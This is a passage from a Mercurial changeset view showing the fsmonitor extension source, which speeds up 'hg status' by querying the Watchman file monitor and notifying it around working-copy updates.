##// END OF EJS Templates
codemod: use pycompat.isdarwin...
Jun Wu -
r34648:dacfcdd8 default
parent child Browse files
Show More
@@ -1,803 +1,803 b''
1 # __init__.py - fsmonitor initialization and overrides
1 # __init__.py - fsmonitor initialization and overrides
2 #
2 #
3 # Copyright 2013-2016 Facebook, Inc.
3 # Copyright 2013-2016 Facebook, Inc.
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 '''Faster status operations with the Watchman file monitor (EXPERIMENTAL)
8 '''Faster status operations with the Watchman file monitor (EXPERIMENTAL)
9
9
10 Integrates the file-watching program Watchman with Mercurial to produce faster
10 Integrates the file-watching program Watchman with Mercurial to produce faster
11 status results.
11 status results.
12
12
13 On a particular Linux system, for a real-world repository with over 400,000
13 On a particular Linux system, for a real-world repository with over 400,000
14 files hosted on ext4, vanilla `hg status` takes 1.3 seconds. On the same
14 files hosted on ext4, vanilla `hg status` takes 1.3 seconds. On the same
15 system, with fsmonitor it takes about 0.3 seconds.
15 system, with fsmonitor it takes about 0.3 seconds.
16
16
17 fsmonitor requires no configuration -- it will tell Watchman about your
17 fsmonitor requires no configuration -- it will tell Watchman about your
18 repository as necessary. You'll need to install Watchman from
18 repository as necessary. You'll need to install Watchman from
19 https://facebook.github.io/watchman/ and make sure it is in your PATH.
19 https://facebook.github.io/watchman/ and make sure it is in your PATH.
20
20
21 The following configuration options exist:
21 The following configuration options exist:
22
22
23 ::
23 ::
24
24
25 [fsmonitor]
25 [fsmonitor]
26 mode = {off, on, paranoid}
26 mode = {off, on, paranoid}
27
27
28 When `mode = off`, fsmonitor will disable itself (similar to not loading the
28 When `mode = off`, fsmonitor will disable itself (similar to not loading the
29 extension at all). When `mode = on`, fsmonitor will be enabled (the default).
29 extension at all). When `mode = on`, fsmonitor will be enabled (the default).
30 When `mode = paranoid`, fsmonitor will query both Watchman and the filesystem,
30 When `mode = paranoid`, fsmonitor will query both Watchman and the filesystem,
31 and ensure that the results are consistent.
31 and ensure that the results are consistent.
32
32
33 ::
33 ::
34
34
35 [fsmonitor]
35 [fsmonitor]
36 timeout = (float)
36 timeout = (float)
37
37
38 A value, in seconds, that determines how long fsmonitor will wait for Watchman
38 A value, in seconds, that determines how long fsmonitor will wait for Watchman
39 to return results. Defaults to `2.0`.
39 to return results. Defaults to `2.0`.
40
40
41 ::
41 ::
42
42
43 [fsmonitor]
43 [fsmonitor]
44 blacklistusers = (list of userids)
44 blacklistusers = (list of userids)
45
45
46 A list of usernames for which fsmonitor will disable itself altogether.
46 A list of usernames for which fsmonitor will disable itself altogether.
47
47
48 ::
48 ::
49
49
50 [fsmonitor]
50 [fsmonitor]
51 walk_on_invalidate = (boolean)
51 walk_on_invalidate = (boolean)
52
52
53 Whether or not to walk the whole repo ourselves when our cached state has been
53 Whether or not to walk the whole repo ourselves when our cached state has been
54 invalidated, for example when Watchman has been restarted or .hgignore rules
54 invalidated, for example when Watchman has been restarted or .hgignore rules
55 have been changed. Walking the repo in that case can result in competing for
55 have been changed. Walking the repo in that case can result in competing for
56 I/O with Watchman. For large repos it is recommended to set this value to
56 I/O with Watchman. For large repos it is recommended to set this value to
57 false. You may wish to set this to true if you have a very fast filesystem
57 false. You may wish to set this to true if you have a very fast filesystem
58 that can outpace the IPC overhead of getting the result data for the full repo
58 that can outpace the IPC overhead of getting the result data for the full repo
59 from Watchman. Defaults to false.
59 from Watchman. Defaults to false.
60
60
61 fsmonitor is incompatible with the largefiles and eol extensions, and
61 fsmonitor is incompatible with the largefiles and eol extensions, and
62 will disable itself if any of those are active.
62 will disable itself if any of those are active.
63
63
64 '''
64 '''
65
65
66 # Platforms Supported
66 # Platforms Supported
67 # ===================
67 # ===================
68 #
68 #
69 # **Linux:** *Stable*. Watchman and fsmonitor are both known to work reliably,
69 # **Linux:** *Stable*. Watchman and fsmonitor are both known to work reliably,
70 # even under severe loads.
70 # even under severe loads.
71 #
71 #
72 # **Mac OS X:** *Stable*. The Mercurial test suite passes with fsmonitor
72 # **Mac OS X:** *Stable*. The Mercurial test suite passes with fsmonitor
73 # turned on, on case-insensitive HFS+. There has been a reasonable amount of
73 # turned on, on case-insensitive HFS+. There has been a reasonable amount of
74 # user testing under normal loads.
74 # user testing under normal loads.
75 #
75 #
76 # **Solaris, BSD:** *Alpha*. watchman and fsmonitor are believed to work, but
76 # **Solaris, BSD:** *Alpha*. watchman and fsmonitor are believed to work, but
77 # very little testing has been done.
77 # very little testing has been done.
78 #
78 #
79 # **Windows:** *Alpha*. Not in a release version of watchman or fsmonitor yet.
79 # **Windows:** *Alpha*. Not in a release version of watchman or fsmonitor yet.
80 #
80 #
81 # Known Issues
81 # Known Issues
82 # ============
82 # ============
83 #
83 #
84 # * fsmonitor will disable itself if any of the following extensions are
84 # * fsmonitor will disable itself if any of the following extensions are
85 # enabled: largefiles, inotify, eol; or if the repository has subrepos.
85 # enabled: largefiles, inotify, eol; or if the repository has subrepos.
86 # * fsmonitor will produce incorrect results if nested repos that are not
86 # * fsmonitor will produce incorrect results if nested repos that are not
87 # subrepos exist. *Workaround*: add nested repo paths to your `.hgignore`.
87 # subrepos exist. *Workaround*: add nested repo paths to your `.hgignore`.
88 #
88 #
89 # The issues related to nested repos and subrepos are probably not fundamental
89 # The issues related to nested repos and subrepos are probably not fundamental
90 # ones. Patches to fix them are welcome.
90 # ones. Patches to fix them are welcome.
91
91
92 from __future__ import absolute_import
92 from __future__ import absolute_import
93
93
94 import codecs
94 import codecs
95 import hashlib
95 import hashlib
96 import os
96 import os
97 import stat
97 import stat
98 import sys
98 import sys
99 import weakref
99 import weakref
100
100
101 from mercurial.i18n import _
101 from mercurial.i18n import _
102 from mercurial.node import (
102 from mercurial.node import (
103 hex,
103 hex,
104 nullid,
104 nullid,
105 )
105 )
106
106
107 from mercurial import (
107 from mercurial import (
108 context,
108 context,
109 encoding,
109 encoding,
110 error,
110 error,
111 extensions,
111 extensions,
112 localrepo,
112 localrepo,
113 merge,
113 merge,
114 pathutil,
114 pathutil,
115 pycompat,
115 pycompat,
116 registrar,
116 registrar,
117 scmutil,
117 scmutil,
118 util,
118 util,
119 )
119 )
120 from mercurial import match as matchmod
120 from mercurial import match as matchmod
121
121
122 from . import (
122 from . import (
123 pywatchman,
123 pywatchman,
124 state,
124 state,
125 watchmanclient,
125 watchmanclient,
126 )
126 )
127
127
# Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core'
# for extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
# be specifying the version(s) of Mercurial they are tested with, or
# leave the attribute unspecified.
testedwith = 'ships-with-hg-core'

# Register the configuration knobs documented in the module docstring so
# that ui.config*() knows about their defaults.
configtable = {}
configitem = registrar.configitem(configtable)

configitem('fsmonitor', 'mode',
    default='on',
)
configitem('fsmonitor', 'walk_on_invalidate',
    default=False,
)
configitem('fsmonitor', 'timeout',
    default='2',
)
configitem('fsmonitor', 'blacklistusers',
    default=list,
)

# This extension is incompatible with the following blacklisted extensions
# and will disable itself when encountering one of these:
_blacklist = ['largefiles', 'eol']
153
153
def _handleunavailable(ui, state, ex):
    """Log and handle an exception raised while talking to Watchman.

    For watchmanclient.Unavailable errors this optionally warns the user
    and invalidates the cached fsmonitor state; any other exception is
    only logged.
    """
    if not isinstance(ex, watchmanclient.Unavailable):
        ui.log('fsmonitor', 'Watchman exception: %s\n', ex)
        return
    if ex.warn:
        ui.warn(str(ex) + '\n')
    if ex.invalidate:
        state.invalidate()
    ui.log('fsmonitor', 'Watchman unavailable: %s\n', ex.msg)
164
164
165 def _hashignore(ignore):
165 def _hashignore(ignore):
166 """Calculate hash for ignore patterns and filenames
166 """Calculate hash for ignore patterns and filenames
167
167
168 If this information changes between Mercurial invocations, we can't
168 If this information changes between Mercurial invocations, we can't
169 rely on Watchman information anymore and have to re-scan the working
169 rely on Watchman information anymore and have to re-scan the working
170 copy.
170 copy.
171
171
172 """
172 """
173 sha1 = hashlib.sha1()
173 sha1 = hashlib.sha1()
174 sha1.update(repr(ignore))
174 sha1.update(repr(ignore))
175 return sha1.hexdigest()
175 return sha1.hexdigest()
176
176
# Watchman may report paths in an encoding that differs from the local
# filesystem encoding (the function docstring below notes it is always
# utf-8 on Windows).  Detect the mismatch once at module load time;
# _watchmantofsencoding() is only applied when _fixencoding is true.
_watchmanencoding = pywatchman.encoding.get_local_encoding()
_fsencoding = sys.getfilesystemencoding() or sys.getdefaultencoding()
_fixencoding = codecs.lookup(_watchmanencoding) != codecs.lookup(_fsencoding)
180
180
def _watchmantofsencoding(path):
    """Re-encode a path from watchman's encoding to the filesystem encoding.

    Watchman's path encoding can differ from the local filesystem
    encoding; for example, on Windows it is always utf-8.  Raises
    error.Abort if the path cannot be converted.
    """
    try:
        decoded = path.decode(_watchmanencoding)
    except UnicodeDecodeError as e:
        raise error.Abort(str(e), hint='watchman encoding error')

    try:
        return decoded.encode(_fsencoding, 'strict')
    except UnicodeEncodeError as e:
        raise error.Abort(str(e))
198
198
def overridewalk(orig, self, match, subrepos, unknown, ignored, full=True):
    '''Replacement for dirstate.walk, hooking into Watchman.

    Whenever full is False, ignored is False, and the Watchman client is
    available, use Watchman combined with saved state to possibly return only a
    subset of files.'''
    # Fall back to the original (unaccelerated) dirstate.walk.
    def bail():
        return orig(match, subrepos, unknown, ignored, full=True)

    if full or ignored or not self._watchmanclient.available():
        return bail()
    state = self._fsmonitorstate
    clock, ignorehash, notefiles = state.get()
    if not clock:
        if state.walk_on_invalidate:
            return bail()
        # Initial NULL clock value, see
        # https://facebook.github.io/watchman/docs/clockspec.html
        clock = 'c:0:0'
        notefiles = []

    # NOTE(review): fwarn and badtype are defined here but never referenced
    # in this function body — presumably kept for parity with the stock
    # dirstate.walk implementation; confirm before removing.
    def fwarn(f, msg):
        self._ui.warn('%s: %s\n' % (self.pathto(f), msg))
        return False

    def badtype(mode):
        kind = _('unknown')
        if stat.S_ISCHR(mode):
            kind = _('character device')
        elif stat.S_ISBLK(mode):
            kind = _('block device')
        elif stat.S_ISFIFO(mode):
            kind = _('fifo')
        elif stat.S_ISSOCK(mode):
            kind = _('socket')
        elif stat.S_ISDIR(mode):
            kind = _('directory')
        return _('unsupported file type (type is %s)') % kind

    ignore = self._ignore
    dirignore = self._dirignore
    if unknown:
        if _hashignore(ignore) != ignorehash and clock != 'c:0:0':
            # ignore list changed -- can't rely on Watchman state any more
            if state.walk_on_invalidate:
                return bail()
            notefiles = []
            clock = 'c:0:0'
    else:
        # always ignore
        ignore = util.always
        dirignore = util.always

    # Hoist frequently-used attributes into locals for the loops below.
    matchfn = match.matchfn
    matchalways = match.always()
    dmap = self._map._map
    nonnormalset = getattr(self, '_nonnormalset', None)

    copymap = self._map.copymap
    getkind = stat.S_IFMT
    dirkind = stat.S_IFDIR
    regkind = stat.S_IFREG
    lnkkind = stat.S_IFLNK
    join = self._join
    normcase = util.normcase
    fresh_instance = False

    exact = skipstep3 = False
    if match.isexact(): # match.exact
        exact = True
        dirignore = util.always # skip step 2
    elif match.prefix(): # match.match, no patterns
        skipstep3 = True

    if not exact and self._checkcase:
        # note that even though we could receive directory entries, we're only
        # interested in checking if a file with the same name exists. So only
        # normalize files if possible.
        normalize = self._normalizefile
        skipstep3 = False
    else:
        normalize = None

    # step 1: find all explicit files
    results, work, dirsnotfound = self._walkexplicit(match, subrepos)

    skipstep3 = skipstep3 and not (work or dirsnotfound)
    work = [d for d in work if not dirignore(d[0])]

    if not work and (exact or skipstep3):
        for s in subrepos:
            del results[s]
        del results['.hg']
        return results

    # step 2: query Watchman
    try:
        # Use the user-configured timeout for the query.
        # Add a little slack over the top of the user query to allow for
        # overheads while transferring the data
        self._watchmanclient.settimeout(state.timeout + 0.1)
        result = self._watchmanclient.command('query', {
            'fields': ['mode', 'mtime', 'size', 'exists', 'name'],
            'since': clock,
            'expression': [
                'not', [
                    'anyof', ['dirname', '.hg'],
                    ['name', '.hg', 'wholename']
                ]
            ],
            'sync_timeout': int(state.timeout * 1000),
            'empty_on_fresh_instance': state.walk_on_invalidate,
        })
    except Exception as ex:
        _handleunavailable(self._ui, state, ex)
        self._watchmanclient.clearconnection()
        return bail()
    else:
        # We need to propagate the last observed clock up so that we
        # can use it for our next query
        state.setlastclock(result['clock'])
        if result['is_fresh_instance']:
            if state.walk_on_invalidate:
                state.invalidate()
                return bail()
            fresh_instance = True
            # Ignore any prior noteable files from the state info
            notefiles = []

    # for file paths which require normalization and we encounter a case
    # collision, we store our own foldmap
    if normalize:
        foldmap = dict((normcase(k), k) for k in results)

    switch_slashes = pycompat.ossep == '\\'
    # The order of the results is, strictly speaking, undefined.
    # For case changes on a case insensitive filesystem we may receive
    # two entries, one with exists=True and another with exists=False.
    # The exists=True entries in the same response should be interpreted
    # as being happens-after the exists=False entries due to the way that
    # Watchman tracks files. We use this property to reconcile deletes
    # for name case changes.
    for entry in result['files']:
        fname = entry['name']
        if _fixencoding:
            fname = _watchmantofsencoding(fname)
        if switch_slashes:
            fname = fname.replace('\\', '/')
        if normalize:
            normed = normcase(fname)
            fname = normalize(fname, True, True)
            foldmap[normed] = fname
        fmode = entry['mode']
        fexists = entry['exists']
        kind = getkind(fmode)

        if not fexists:
            # if marked as deleted and we don't already have a change
            # record, mark it as deleted. If we already have an entry
            # for fname then it was either part of walkexplicit or was
            # an earlier result that was a case change
            if fname not in results and fname in dmap and (
                    matchalways or matchfn(fname)):
                results[fname] = None
        elif kind == dirkind:
            if fname in dmap and (matchalways or matchfn(fname)):
                results[fname] = None
        elif kind == regkind or kind == lnkkind:
            if fname in dmap:
                if matchalways or matchfn(fname):
                    results[fname] = entry
            elif (matchalways or matchfn(fname)) and not ignore(fname):
                results[fname] = entry
        elif fname in dmap and (matchalways or matchfn(fname)):
            results[fname] = None

    # step 3: query notable files we don't already know about
    # XXX try not to iterate over the entire dmap
    if normalize:
        # any notable files that have changed case will already be handled
        # above, so just check membership in the foldmap
        notefiles = set((normalize(f, True, True) for f in notefiles
                         if normcase(f) not in foldmap))
    visit = set((f for f in notefiles if (f not in results and matchfn(f)
                 and (f in dmap or not ignore(f)))))

    if nonnormalset is not None and not fresh_instance:
        if matchalways:
            visit.update(f for f in nonnormalset if f not in results)
            visit.update(f for f in copymap if f not in results)
        else:
            visit.update(f for f in nonnormalset
                         if f not in results and matchfn(f))
            visit.update(f for f in copymap
                         if f not in results and matchfn(f))
    else:
        # NOTE(review): py2-only iteration (dict.iteritems); st looks like a
        # dirstate tuple where st[0] is the state char and st[2] the size —
        # confirm against mercurial.dirstate before relying on this.
        if matchalways:
            visit.update(f for f, st in dmap.iteritems()
                         if (f not in results and
                             (st[2] < 0 or st[0] != 'n' or fresh_instance)))
            visit.update(f for f in copymap if f not in results)
        else:
            visit.update(f for f, st in dmap.iteritems()
                         if (f not in results and
                             (st[2] < 0 or st[0] != 'n' or fresh_instance)
                             and matchfn(f)))
            visit.update(f for f in copymap
                         if f not in results and matchfn(f))

    # Paths failing the path audit are reported with a None stat (treated as
    # nonexistent); the rest are stat'ed in one batch below.
    audit = pathutil.pathauditor(self._root, cached=True).check
    auditpass = [f for f in visit if audit(f)]
    auditpass.sort()
    auditfail = visit.difference(auditpass)
    for f in auditfail:
        results[f] = None

    # NOTE(review): iter(...).next is py2-only (py3 spells it __next__).
    nf = iter(auditpass).next
    for st in util.statfiles([join(f) for f in auditpass]):
        f = nf()
        if st or f in dmap:
            results[f] = st

    # Callers never expect subrepo roots or the .hg directory in the result.
    for s in subrepos:
        del results[s]
    del results['.hg']
    return results
425
425
426 def overridestatus(
426 def overridestatus(
427 orig, self, node1='.', node2=None, match=None, ignored=False,
427 orig, self, node1='.', node2=None, match=None, ignored=False,
428 clean=False, unknown=False, listsubrepos=False):
428 clean=False, unknown=False, listsubrepos=False):
429 listignored = ignored
429 listignored = ignored
430 listclean = clean
430 listclean = clean
431 listunknown = unknown
431 listunknown = unknown
432
432
433 def _cmpsets(l1, l2):
433 def _cmpsets(l1, l2):
434 try:
434 try:
435 if 'FSMONITOR_LOG_FILE' in encoding.environ:
435 if 'FSMONITOR_LOG_FILE' in encoding.environ:
436 fn = encoding.environ['FSMONITOR_LOG_FILE']
436 fn = encoding.environ['FSMONITOR_LOG_FILE']
437 f = open(fn, 'wb')
437 f = open(fn, 'wb')
438 else:
438 else:
439 fn = 'fsmonitorfail.log'
439 fn = 'fsmonitorfail.log'
440 f = self.opener(fn, 'wb')
440 f = self.opener(fn, 'wb')
441 except (IOError, OSError):
441 except (IOError, OSError):
442 self.ui.warn(_('warning: unable to write to %s\n') % fn)
442 self.ui.warn(_('warning: unable to write to %s\n') % fn)
443 return
443 return
444
444
445 try:
445 try:
446 for i, (s1, s2) in enumerate(zip(l1, l2)):
446 for i, (s1, s2) in enumerate(zip(l1, l2)):
447 if set(s1) != set(s2):
447 if set(s1) != set(s2):
448 f.write('sets at position %d are unequal\n' % i)
448 f.write('sets at position %d are unequal\n' % i)
449 f.write('watchman returned: %s\n' % s1)
449 f.write('watchman returned: %s\n' % s1)
450 f.write('stat returned: %s\n' % s2)
450 f.write('stat returned: %s\n' % s2)
451 finally:
451 finally:
452 f.close()
452 f.close()
453
453
454 if isinstance(node1, context.changectx):
454 if isinstance(node1, context.changectx):
455 ctx1 = node1
455 ctx1 = node1
456 else:
456 else:
457 ctx1 = self[node1]
457 ctx1 = self[node1]
458 if isinstance(node2, context.changectx):
458 if isinstance(node2, context.changectx):
459 ctx2 = node2
459 ctx2 = node2
460 else:
460 else:
461 ctx2 = self[node2]
461 ctx2 = self[node2]
462
462
463 working = ctx2.rev() is None
463 working = ctx2.rev() is None
464 parentworking = working and ctx1 == self['.']
464 parentworking = working and ctx1 == self['.']
465 match = match or matchmod.always(self.root, self.getcwd())
465 match = match or matchmod.always(self.root, self.getcwd())
466
466
467 # Maybe we can use this opportunity to update Watchman's state.
467 # Maybe we can use this opportunity to update Watchman's state.
468 # Mercurial uses workingcommitctx and/or memctx to represent the part of
468 # Mercurial uses workingcommitctx and/or memctx to represent the part of
469 # the workingctx that is to be committed. So don't update the state in
469 # the workingctx that is to be committed. So don't update the state in
470 # that case.
470 # that case.
471 # HG_PENDING is set in the environment when the dirstate is being updated
471 # HG_PENDING is set in the environment when the dirstate is being updated
472 # in the middle of a transaction; we must not update our state in that
472 # in the middle of a transaction; we must not update our state in that
473 # case, or we risk forgetting about changes in the working copy.
473 # case, or we risk forgetting about changes in the working copy.
474 updatestate = (parentworking and match.always() and
474 updatestate = (parentworking and match.always() and
475 not isinstance(ctx2, (context.workingcommitctx,
475 not isinstance(ctx2, (context.workingcommitctx,
476 context.memctx)) and
476 context.memctx)) and
477 'HG_PENDING' not in encoding.environ)
477 'HG_PENDING' not in encoding.environ)
478
478
479 try:
479 try:
480 if self._fsmonitorstate.walk_on_invalidate:
480 if self._fsmonitorstate.walk_on_invalidate:
481 # Use a short timeout to query the current clock. If that
481 # Use a short timeout to query the current clock. If that
482 # takes too long then we assume that the service will be slow
482 # takes too long then we assume that the service will be slow
483 # to answer our query.
483 # to answer our query.
484 # walk_on_invalidate indicates that we prefer to walk the
484 # walk_on_invalidate indicates that we prefer to walk the
485 # tree ourselves because we can ignore portions that Watchman
485 # tree ourselves because we can ignore portions that Watchman
486 # cannot and we tend to be faster in the warmer buffer cache
486 # cannot and we tend to be faster in the warmer buffer cache
487 # cases.
487 # cases.
488 self._watchmanclient.settimeout(0.1)
488 self._watchmanclient.settimeout(0.1)
489 else:
489 else:
490 # Give Watchman more time to potentially complete its walk
490 # Give Watchman more time to potentially complete its walk
491 # and return the initial clock. In this mode we assume that
491 # and return the initial clock. In this mode we assume that
492 # the filesystem will be slower than parsing a potentially
492 # the filesystem will be slower than parsing a potentially
493 # very large Watchman result set.
493 # very large Watchman result set.
494 self._watchmanclient.settimeout(
494 self._watchmanclient.settimeout(
495 self._fsmonitorstate.timeout + 0.1)
495 self._fsmonitorstate.timeout + 0.1)
496 startclock = self._watchmanclient.getcurrentclock()
496 startclock = self._watchmanclient.getcurrentclock()
497 except Exception as ex:
497 except Exception as ex:
498 self._watchmanclient.clearconnection()
498 self._watchmanclient.clearconnection()
499 _handleunavailable(self.ui, self._fsmonitorstate, ex)
499 _handleunavailable(self.ui, self._fsmonitorstate, ex)
500 # boo, Watchman failed. bail
500 # boo, Watchman failed. bail
501 return orig(node1, node2, match, listignored, listclean,
501 return orig(node1, node2, match, listignored, listclean,
502 listunknown, listsubrepos)
502 listunknown, listsubrepos)
503
503
504 if updatestate:
504 if updatestate:
505 # We need info about unknown files. This may make things slower the
505 # We need info about unknown files. This may make things slower the
506 # first time, but whatever.
506 # first time, but whatever.
507 stateunknown = True
507 stateunknown = True
508 else:
508 else:
509 stateunknown = listunknown
509 stateunknown = listunknown
510
510
511 if updatestate:
511 if updatestate:
512 ps = poststatus(startclock)
512 ps = poststatus(startclock)
513 self.addpostdsstatus(ps)
513 self.addpostdsstatus(ps)
514
514
515 r = orig(node1, node2, match, listignored, listclean, stateunknown,
515 r = orig(node1, node2, match, listignored, listclean, stateunknown,
516 listsubrepos)
516 listsubrepos)
517 modified, added, removed, deleted, unknown, ignored, clean = r
517 modified, added, removed, deleted, unknown, ignored, clean = r
518
518
519 if not listunknown:
519 if not listunknown:
520 unknown = []
520 unknown = []
521
521
522 # don't do paranoid checks if we're not going to query Watchman anyway
522 # don't do paranoid checks if we're not going to query Watchman anyway
523 full = listclean or match.traversedir is not None
523 full = listclean or match.traversedir is not None
524 if self._fsmonitorstate.mode == 'paranoid' and not full:
524 if self._fsmonitorstate.mode == 'paranoid' and not full:
525 # run status again and fall back to the old walk this time
525 # run status again and fall back to the old walk this time
526 self.dirstate._fsmonitordisable = True
526 self.dirstate._fsmonitordisable = True
527
527
528 # shut the UI up
528 # shut the UI up
529 quiet = self.ui.quiet
529 quiet = self.ui.quiet
530 self.ui.quiet = True
530 self.ui.quiet = True
531 fout, ferr = self.ui.fout, self.ui.ferr
531 fout, ferr = self.ui.fout, self.ui.ferr
532 self.ui.fout = self.ui.ferr = open(os.devnull, 'wb')
532 self.ui.fout = self.ui.ferr = open(os.devnull, 'wb')
533
533
534 try:
534 try:
535 rv2 = orig(
535 rv2 = orig(
536 node1, node2, match, listignored, listclean, listunknown,
536 node1, node2, match, listignored, listclean, listunknown,
537 listsubrepos)
537 listsubrepos)
538 finally:
538 finally:
539 self.dirstate._fsmonitordisable = False
539 self.dirstate._fsmonitordisable = False
540 self.ui.quiet = quiet
540 self.ui.quiet = quiet
541 self.ui.fout, self.ui.ferr = fout, ferr
541 self.ui.fout, self.ui.ferr = fout, ferr
542
542
543 # clean isn't tested since it's set to True above
543 # clean isn't tested since it's set to True above
544 _cmpsets([modified, added, removed, deleted, unknown, ignored, clean],
544 _cmpsets([modified, added, removed, deleted, unknown, ignored, clean],
545 rv2)
545 rv2)
546 modified, added, removed, deleted, unknown, ignored, clean = rv2
546 modified, added, removed, deleted, unknown, ignored, clean = rv2
547
547
548 return scmutil.status(
548 return scmutil.status(
549 modified, added, removed, deleted, unknown, ignored, clean)
549 modified, added, removed, deleted, unknown, ignored, clean)
550
550
class poststatus(object):
    """Post-dirstate-status hook that persists fsmonitor state.

    Remembers the watchman clock sampled before the status walk and, when
    called back after the dirstate status completes, records the freshest
    clock, the hash of the ignore rules, and the files watchman must keep
    reporting.
    """

    def __init__(self, startclock):
        # clock queried before the walk started; fallback when no fresher
        # clock was recorded during the walk
        self._startclock = startclock

    def __call__(self, wctx, status):
        repo = wctx.repo()
        clock = repo._fsmonitorstate.getlastclock() or self._startclock
        hashignore = _hashignore(repo.dirstate._ignore)
        notefiles = (status.modified + status.added + status.removed +
                     status.deleted + status.unknown)
        repo._fsmonitorstate.set(clock, hashignore, notefiles)
561
561
def makedirstate(repo, dirstate):
    """Mix fsmonitor support into *dirstate* in place.

    Replaces dirstate.__class__ with a subclass whose walk() consults
    watchman (unless disabled for paranoid-mode double checking) and whose
    rebuild()/invalidate() also invalidate the persisted fsmonitor state.
    """
    class fsmonitordirstate(dirstate.__class__):
        def _fsmonitorinit(self, repo):
            # _fsmonitordisable is used in paranoid mode
            self._fsmonitordisable = False
            self._fsmonitorstate = repo._fsmonitorstate
            self._watchmanclient = repo._watchmanclient
            # weak proxy to avoid a reference cycle repo -> dirstate -> repo
            self._repo = weakref.proxy(repo)

        def walk(self, *args, **kwargs):
            orig = super(fsmonitordirstate, self).walk
            if self._fsmonitordisable:
                # paranoid mode re-runs status with fsmonitor turned off
                return orig(*args, **kwargs)
            return overridewalk(orig, self, *args, **kwargs)

        def rebuild(self, *args, **kwargs):
            # the on-disk fsmonitor state no longer matches; discard it
            self._fsmonitorstate.invalidate()
            return super(fsmonitordirstate, self).rebuild(*args, **kwargs)

        def invalidate(self, *args, **kwargs):
            self._fsmonitorstate.invalidate()
            return super(fsmonitordirstate, self).invalidate(*args, **kwargs)

        # setparents is only wrapped when the experimental working-copy
        # change notification is enabled in the config
        if dirstate._ui.configbool(
            "experimental", "fsmonitor.wc_change_notify"):
            def setparents(self, p1, p2=nullid):
                with state_update(self._repo, name="hg.wc_change",
                                  oldnode=self._pl[0], newnode=p1,
                                  partial=False):
                    return super(fsmonitordirstate, self).setparents(p1, p2)

    dirstate.__class__ = fsmonitordirstate
    dirstate._fsmonitorinit(repo)
595
595
def wrapdirstate(orig, self):
    """filecache wrapper: mix fsmonitor behavior into a new dirstate."""
    ds = orig(self)
    # Watchman support was only set up for eligible repos; leave the
    # dirstate untouched otherwise.
    if not util.safehasattr(self, '_fsmonitorstate'):
        return ds
    makedirstate(self, ds)
    return ds
602
602
def extsetup(ui):
    """Extension setup: install the fsmonitor wrappers.

    Wraps dirstate creation, os.symlink (macOS only, to work around the
    fsevents dangling-symlink issue), and merge.update.
    """
    extensions.wrapfilecache(
        localrepo.localrepository, 'dirstate', wrapdirstate)
    if pycompat.isdarwin:
        # An assist for avoiding the dangling-symlink fsevents bug
        extensions.wrapfunction(os, 'symlink', wrapsymlink)

    extensions.wrapfunction(merge, 'update', wrapupdate)
611
611
612 def wrapsymlink(orig, source, link_name):
612 def wrapsymlink(orig, source, link_name):
613 ''' if we create a dangling symlink, also touch the parent dir
613 ''' if we create a dangling symlink, also touch the parent dir
614 to encourage fsevents notifications to work more correctly '''
614 to encourage fsevents notifications to work more correctly '''
615 try:
615 try:
616 return orig(source, link_name)
616 return orig(source, link_name)
617 finally:
617 finally:
618 try:
618 try:
619 os.utime(os.path.dirname(link_name), None)
619 os.utime(os.path.dirname(link_name), None)
620 except OSError:
620 except OSError:
621 pass
621 pass
622
622
class state_update(object):
    ''' This context manager is responsible for dispatching the state-enter
    and state-leave signals to the watchman service. The enter and leave
    methods can be invoked manually (for scenarios where context manager
    semantics are not possible). If parameters oldnode and newnode are None,
    they will be populated based on current working copy in enter and
    leave, respectively. Similarly, if the distance is none, it will be
    calculated based on the oldnode and newnode in the leave method.'''

    def __init__(self, repo, name, oldnode=None, newnode=None, distance=None,
                 partial=False):
        # use the unfiltered repo so node lookups cannot be hidden by a view
        self.repo = repo.unfiltered()
        self.name = name
        self.oldnode = oldnode
        self.newnode = newnode
        self.distance = distance
        self.partial = partial
        self._lock = None
        # True only after state-enter was successfully sent to watchman
        self.need_leave = False

    def __enter__(self):
        self.enter()

    def enter(self):
        """Take the wlock and send state-enter to watchman."""
        # We explicitly need to take a lock here, before we proceed to update
        # watchman about the update operation, so that we don't race with
        # some other actor. merge.update is going to take the wlock almost
        # immediately anyway, so this is effectively extending the lock
        # around a couple of short sanity checks.
        if self.oldnode is None:
            self.oldnode = self.repo['.'].node()
        self._lock = self.repo.wlock()
        self.need_leave = self._state(
            'state-enter',
            hex(self.oldnode))
        return self

    def __exit__(self, type_, value, tb):
        abort = True if type_ else False
        self.exit(abort=abort)

    def exit(self, abort=False):
        """Send state-leave (if state-enter succeeded) and drop the wlock."""
        try:
            if self.need_leave:
                status = 'failed' if abort else 'ok'
                if self.newnode is None:
                    self.newnode = self.repo['.'].node()
                if self.distance is None:
                    self.distance = calcdistance(
                        self.repo, self.oldnode, self.newnode)
                self._state(
                    'state-leave',
                    hex(self.newnode),
                    status=status)
        finally:
            # always release, even if the watchman command raised
            self.need_leave = False
            if self._lock:
                self._lock.release()

    def _state(self, cmd, commithash, status='ok'):
        """Send *cmd* to watchman; return True on success, False otherwise."""
        if not util.safehasattr(self.repo, '_watchmanclient'):
            return False
        try:
            self.repo._watchmanclient.command(cmd, {
                'name': self.name,
                'metadata': {
                    # the target revision
                    'rev': commithash,
                    # approximate number of commits between current and target
                    'distance': self.distance if self.distance else 0,
                    # success/failure (only really meaningful for state-leave)
                    'status': status,
                    # whether the working copy parent is changing
                    'partial': self.partial,
                }})
            return True
        except Exception as e:
            # Swallow any errors; fire and forget
            self.repo.ui.log(
                'watchman', 'Exception %s while running %s\n', e, cmd)
            return False
704
704
# Estimate the distance between two nodes
def calcdistance(repo, oldnode, newnode):
    """Return the approximate number of commits between two nodes.

    Computed as the sum of each node's revision distance to their common
    ancestor in the changelog.
    """
    ancrev = repo[repo.changelog.ancestor(oldnode, newnode)].rev()
    oldrev = repo[oldnode].rev()
    newrev = repo[newnode].rev()
    return abs(oldrev - ancrev) + abs(newrev - ancrev)
712
712
# Bracket working copy updates with calls to the watchman state-enter
# and state-leave commands. This allows clients to perform more intelligent
# settling during bulk file change scenarios
# https://facebook.github.io/watchman/docs/cmd/subscribe.html#advanced-settling
def wrapupdate(orig, repo, node, branchmerge, force, ancestor=None,
               mergeancestor=False, labels=None, matcher=None, **kwargs):
    """merge.update wrapper: notify watchman around the working-copy update.

    An update restricted by a non-always matcher is reported as 'partial';
    for full updates the revision distance is estimated so watchman clients
